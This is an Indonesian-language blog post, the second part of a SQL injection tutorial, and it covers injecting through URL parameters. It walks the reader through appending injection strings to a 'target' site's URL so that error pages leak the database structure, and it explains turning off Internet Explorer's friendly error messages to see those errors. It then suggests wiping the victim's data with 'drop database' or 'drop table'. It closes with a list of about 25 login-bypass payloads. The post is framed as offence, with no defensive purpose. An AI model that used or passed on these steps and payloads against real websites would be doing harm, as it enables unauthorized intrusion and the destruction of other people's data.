01 April 2008

sql injection bagian II

kemarin sudah saya bahas bagaimana melakukan injection dalam input box. nach sekarang saya aka menaggapin akan komentar yang dilontarakan oleh noviana, bagaimana menggunakan sql injection based url.

sebenarnya teknik injection url ini sama dengan injection input box tapi bedanya kita menuliskan string sql nya pada url si target.

misalnya :www.target.com/moreinfo.cfm?ProductID=245

Nah, ketikkan string injeksi SQL tadi ke address bar anda dibelakang url target itu, contohnya:

www.target.com/moreinfo.cfm?ProductID=245' having 1=1--
atau
www.target.com/moreinfo.cfm?ProductID=245' having 1=1--

nah jika berhasil akan ada tampilan error page dari situs itu yang memberi informasi tentang struktur database situs itu. Dari hasil informasi yang kita dapat ini, kita dapat melakukan serangan berikutnya.

Apabila browser kita adalah Internet Explorer, ada sebagian situs yang tidak menampilkan error-nya, ini dikarenakan opsi Show Friendly HTTP Error Messages diaktifkan. Untuk itu kita perlu menonaktifkannya dengan cara menghilangkan tanda centang di kotaknya.

Opsi ini dapat anda temukan di Tools > Internet Option > Advanced cari opsinya di bagian Browsing lalu hilangkan tanda centangnya dan klik tombol Apply.





Sesudah itu apabila anda menemui error page yang berisi HTTP 500 error - internal server error- sebelum men-set opsi tadi, anda cukup menekan tombol Refresh, lalu terlihatlah sudah error-nya. Setelah kita tahu struktur database-nya, dengan pengetahuan dasar dari belajar SQL kita dapat menghancurkan database itu dengan perintah ' drop database [nama_database] atau drop table [nama_table]. :>

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
’or 1=1–
’or 0=0 –
’or ’x’=’x
’or a=a-
“or 0=0 –
“or 0=0 #
“or “x”=”x
“)or(”a”=”a
admin’–
hi” or 1=1 –
hi’ or’a’=’a
hi”)or(”a”=”a
or 0=0 #
’or a=a–
’or 0=0 #
’having 1=1–
“or 1=1–
“or “a”=”a
’)or(’a’=’a
’)or(’x’=’x
hi” or “a”=”a
hi’ or 1=1 –
hi’)or(’a’=’a
or 0=0 –
or 1=1–
Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang.

mungkin ini bisa membantu anda yang ingin tahu apa itu sql injection, mungkin kalo ada kekurangan anda bisa tanya pada om google aja ok. ^_^

sumber: http://students.ee.itb.ac.id/~htamici/drupal/?q=node/4
Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...
0 Komentar untuk "sql injection bagian II"
 
Back To Top